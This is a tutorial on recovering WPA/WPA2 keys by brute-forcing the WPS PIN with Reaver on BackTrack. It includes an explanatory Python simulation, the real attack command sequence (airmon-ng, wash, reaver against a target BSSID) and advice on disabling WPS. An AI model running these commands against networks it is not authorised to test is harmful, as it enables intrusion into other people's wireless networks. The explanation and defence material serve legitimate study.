First, you will need a USB flash drive to boot BackTrack Linux from.
BackTrack is a standalone (live) Linux distribution that comes packed with a suite of tools for network monitoring and security auditing. In this case, we will use BackTrack to exploit a weakness in the WPS implementation of a wireless access point.
Do not use this tutorial for malicious purposes!
The Reaver tool is installed in BackTrack by default and will help us obtain the WPS PIN, and through it the WPA/WPA2 key, of the wireless network we want to access (its SSID and BSSID are already visible in the scan). Reaver exploits a design flaw found on most routers and access points that implement WPS (Wi-Fi Protected Setup) with the PIN method enabled.
How is the Wi-Fi password snatched?
Reaver brute-forces the WPS PIN, but it does not have to try all 100,000,000 eight-digit combinations. The PIN's last digit is a checksum of the first seven, which already leaves only 10,000,000 valid PINs. The real flaw is that the access point answers the two halves of the PIN separately: if the first four digits are wrong it sends a NACK right after message M4, and only if they are right does it go on to check the last four (after M6). Reaver therefore first finds the first half (at most 10,000 tries), then the second half (three free digits plus the checksum, at most 1,000 tries): 11,000 attempts in the worst case instead of millions, which is why the key can fall in hours.
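The following is an added example, not code from this tutorial or from Reaver itself. It simulates the leak described above so you can see the arithmetic in action: a stand-in access point (the SimulatedAccessPoint class, an assumption that models only the half-by-half NACK behaviour, not the real EAP/WPS messages, rate limiting or lockouts) accepts PIN attempts, and the crack() function performs the same split search Reaver does. The checksum routine is the one from the Wi-Fi Simple Configuration specification.

```python
"""
WPS PIN split brute force, simulated.

The PIN is 8 digits; the 8th is a checksum of the first 7, and during the
WPS exchange the access point acknowledges the first 4 digits (after M4)
separately from the last 4 (after M6).  An attacker therefore needs at most
10^4 + 10^3 = 11,000 attempts instead of 10^7 (or 10^8 ignoring the checksum).
"""
import random


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix: digits weighted
    3,1,3,1,... from the right, summed, and completed to a multiple of 10."""
    accum = 0
    n = first_seven
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def make_pin(first_seven: int) -> str:
    """Build a valid 8-digit PIN string from its first 7 digits."""
    return f"{first_seven:07d}{wps_checksum(first_seven)}"


class SimulatedAccessPoint:
    """Stand-in for the AP side of the WPS exchange (an assumption for this
    example: it models only the half-by-half leak).

    try_pin() returns where the exchange stops:
      'NACK after M4' - first half of the PIN wrong
      'NACK after M6' - first half right, second half wrong
      'M7'            - whole PIN right; a real AP would now hand over the WPA key
    """

    def __init__(self, pin: str):
        if len(pin) != 8 or not pin.isdigit():
            raise ValueError("PIN must be 8 digits")
        self._first, self._second = pin[:4], pin[4:]
        self.messages_seen = 0  # PIN attempts the AP has processed

    def try_pin(self, candidate: str) -> str:
        self.messages_seen += 1
        if candidate[:4] != self._first:
            return "NACK after M4"
        if candidate[4:] != self._second:
            return "NACK after M6"
        return "M7"


def crack(ap: SimulatedAccessPoint):
    """Split brute force as Reaver does it. Returns (pin, attempts_used)."""
    attempts = 0
    first_half = None
    # Phase 1: find the first 4 digits. The second half is a placeholder
    # ("000" plus a valid checksum) so the candidate is always a well-formed PIN.
    for a in range(10_000):
        candidate = make_pin(a * 1000)
        attempts += 1
        if ap.try_pin(candidate) != "NACK after M4":
            first_half = a
            break
    if first_half is None:
        raise RuntimeError("AP did not confirm any first half")
    # Phase 2: 3 free digits + checksum = at most 1,000 candidates.
    for b in range(1_000):
        candidate = make_pin(first_half * 1000 + b)
        attempts += 1
        if ap.try_pin(candidate) == "M7":
            return candidate, attempts
    raise RuntimeError("AP confirmed the first half but never the second")


def worst_case_attempts() -> int:
    """Upper bound on attempts for the split attack (versus 10,000,000 naive)."""
    return 10_000 + 1_000


if __name__ == "__main__":
    # Constructed sample input: a random valid PIN, not any real device's PIN.
    secret = make_pin(random.randrange(10_000_000))
    pin, used = crack(SimulatedAccessPoint(secret))
    print(f"recovered {pin} in {used} attempts (naive worst case: 10,000,000)")
```

The simulation assumes the AP's PIN carries a valid checksum, as the WPS specification requires, and it ignores what makes the real attack take hours rather than seconds: each attempt is a full EAP exchange over the air, and many access points slow down or temporarily lock out WPS after a burst of failures.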
What commands do you use?
- airmon-ng lists the wireless interfaces the system has detected.
- airmon-ng start wlan0 (or wlan1, depending on how many wireless cards were detected and which one you want to use) puts that card into monitor mode and creates the monitor interface mon0.
- wash -i mon0 scans for access points that advertise WPS and prints their BSSID, channel and SSID. If you get the "Found packet with bad FCS, skipping..." error, try wash -i mon0 --ignore-fcs.
- reaver -i mon0 -b <BSSID> -d 0 -vv starts the attack. The BSSID is the target's MAC address as printed by wash, not its name; -d 0 removes the delay between PIN attempts, and -vv makes Reaver show every attempt.
Now you will have to wait anywhere from a few minutes to several hours before Reaver reports the WPS PIN and the Wi-Fi password.
How do you protect against this exploit?
It's simple. Just deactivate WPS (it is called QSS on TP-Link routers). It is normally enabled by default from the factory because the router needs it to obtain WPS certification. Then verify: some firmware keeps answering WPS PIN requests even after the option is switched off, so run wash again and make sure your access point no longer shows up as advertising WPS; if it does, look for a firmware update or a separate setting for the PIN method.